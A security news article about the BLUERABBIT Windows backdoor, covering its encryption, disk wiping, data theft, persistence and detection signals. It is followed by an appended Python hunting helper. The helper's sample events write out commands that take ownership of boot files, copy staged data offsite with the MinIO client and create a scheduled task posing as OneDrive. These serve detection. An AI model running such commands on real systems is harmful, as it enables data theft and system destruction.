
Hackers Use BLUERABBIT Backdoor to Encrypt Files and Wipe Disks Across Windows Systems

Cyber Security News · By Tushar Subhra Dutta · June 11, 2026

A newly discovered backdoor called BLUERABBIT has been found targeting Windows systems with a dangerous mix of file encryption, disk wiping, and data theft. First observed in mid-to-late March 2026, the malware is believed to be the work of a threat actor with ties to Iran, and its primary targets appear to be organizations based in Israel. The tool is written in the Go programming language and is built to blend into normal network activity, making it harder for defenders to detect.

What makes BLUERABBIT especially alarming is how complete its toolkit is. It does not just lock files or steal data. It can do both at once, and when operators choose, it can permanently destroy every drive on a compromised machine. This is not a smash-and-grab operation. It is a carefully engineered platform designed to give attackers full, persistent control from the moment it lands on a system.

Analysts at Binary Defense, who detailed their findings in a report shared with Cyber Security News (CSN), linked BLUERABBIT to the same Iran-nexus cluster responsible for two earlier tools, BLUEWIPE and SEWERGOO, which appeared in June 2025. The binary was internally named “Rabbit” and compiled as a developmental build, with symbols left intact, giving researchers unusual visibility into how the malware operates under the hood.

BLUERABBIT disguises its command-and-control traffic to look like routine business messaging software. Rather than reaching out over standard web protocols, it routes operator instructions through RabbitMQ, a widely used enterprise messaging system. This design choice makes its network traffic appear legitimate, especially in environments where similar tools are already deployed as part of normal operations.

[Image: PowerShell persistence command (Source – Binary Defense)]

The malware stores task results using Redis and sends stolen files to attacker-controlled cloud storage through MinIO, an open-source platform compatible with Amazon S3 storage. Together, these three channels give attackers a quiet, business-like infrastructure that many traditional security tools will not flag as suspicious activity.

Hackers Use BLUERABBIT Backdoor

Once BLUERABBIT runs, it checks a Windows registry key to see if it has executed before. If it is the first run, it creates a scheduled task called “OneDrive Update,” impersonating a real Microsoft service to stay hidden. This task restarts every 60 seconds and survives reboots, meaning simply closing the process will not remove it from a system.

The malware gives operators several destructive choices. It can encrypt files across every drive on a system using a “.candy” extension and replace the desktop wallpaper with an AI-generated alert image. Two separate disk-wiping modules are also available: one overwrites drives with random data in a single pass, while the other layers zeros, random data, and 0xFF values across all drives, leaving no path to recovery.

[Image: Raw commands (Source – Binary Defense)]

Before any destruction begins, BLUERABBIT takes ownership of critical Windows boot files and modifies the registry to disable automatic recovery and system repair. Once this sequence starts, Windows cannot reboot into a safe state or attempt any form of self-repair.

Detection Opportunities and How Defenders Can Respond

Defenders have several reliable signals to watch for. BLUERABBIT stages files in folders that look like Windows GUIDs but include letters beyond A through F. Real Windows GUIDs only use hexadecimal characters, so any folder containing characters like G through Z in that format is anomalous and worth investigating immediately.

Unusual AMQP traffic from endpoint workstations is another strong warning sign, since this protocol is not typical for everyday devices. Security teams should also watch for the MinIO client being launched by unexpected parent processes, as this strongly suggests automated data exfiltration is already underway. Any process running takeown or icacls on core boot files outside a scheduled maintenance window should trigger an immediate alert.

The data theft before encryption follows a double extortion model, meaning victims may have already lost sensitive information before they realize they have been targeted. Proactively hunting for early-stage indicators is the most effective defense posture teams can adopt right now.

Indicators of Compromise (IoCs):

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
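A small hunting helper for three of the host-side signals described above, written as an added example that is not part of the article or of Binary Defense's report: it flags GUID-shaped folder names that contain non-hex letters, and classifies process-creation events for takeown/icacls against boot files (suppressed inside a maintenance window), the MinIO client under an unexpected parent, and the scheduled task that impersonates OneDrive. The boot file names, the mc.exe binary name, the expected-parent list and the sample events are assumptions constructed for the example.

```python
import re

# A real Windows GUID is 8-4-4-4-12 hex characters (optionally braced). The
# staging folders keep that shape but use letters beyond F, so "GUID-shaped
# but not purely hex" is the anomaly to hunt for.
GUID_SHAPE = re.compile(r"^\{?[0-9A-Za-z]{8}(-[0-9A-Za-z]{4}){3}-[0-9A-Za-z]{12}\}?$")
NON_HEX_LETTER = re.compile(r"[G-Zg-z]")

def is_pseudo_guid(name):
    """True when a folder name looks like a GUID but contains non-hex letters."""
    return bool(GUID_SHAPE.match(name)) and bool(NON_HEX_LETTER.search(name))

# Assumptions, not values from the report: a few well-known boot files to look for
# in takeown/icacls command lines, the MinIO client binary name, and the parent
# processes from which an administrator might legitimately run it.
BOOT_FILE_HINTS = ("bootmgr", "\\boot\\bcd", "winload.exe", "winresume.exe")
MINIO_CLIENT = "mc.exe"
EXPECTED_MC_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe"}

def classify_process_event(ev, in_maintenance_window=False):
    """Return a detection label for one process-creation event, or None."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    parent = ev["parent_image"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmdline"].lower()
    if image in ("takeown.exe", "icacls.exe") and any(h in cmd for h in BOOT_FILE_HINTS):
        # Ownership/ACL changes on boot files are expected only in a maintenance window.
        return None if in_maintenance_window else "boot_file_ownership_change"
    if image == MINIO_CLIENT and parent not in EXPECTED_MC_PARENTS:
        return "minio_client_unexpected_parent"
    if image == "schtasks.exe" and "/create" in cmd and "onedrive update" in cmd:
        return "scheduled_task_impersonating_onedrive"
    return None

def scan_events(events):
    """Return (event id, label) for every event that trips a rule."""
    return [(ev["id"], lab) for ev in events if (lab := classify_process_event(ev))]

# Constructed sample telemetry (not from the report); e4 is benign and must not fire.
PARENT = r"C:\Users\Public\update.exe"  # placeholder path, not the implant's real name
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\takeown.exe", "parent_image": PARENT,
     "cmdline": r"takeown /f C:\Boot\BCD"},
    {"id": "e2", "image": r"C:\Tools\mc.exe", "parent_image": PARENT,
     "cmdline": r"mc cp --recursive C:\Staging\ offsite/bucket"},
    {"id": "e3", "image": r"C:\Windows\System32\schtasks.exe", "parent_image": PARENT,
     "cmdline": r'schtasks /create /tn "OneDrive Update" /tr ' + PARENT},
    {"id": "e4", "image": r"C:\Windows\System32\icacls.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"icacls C:\Users\alice\Documents /grant alice:F"},
]
```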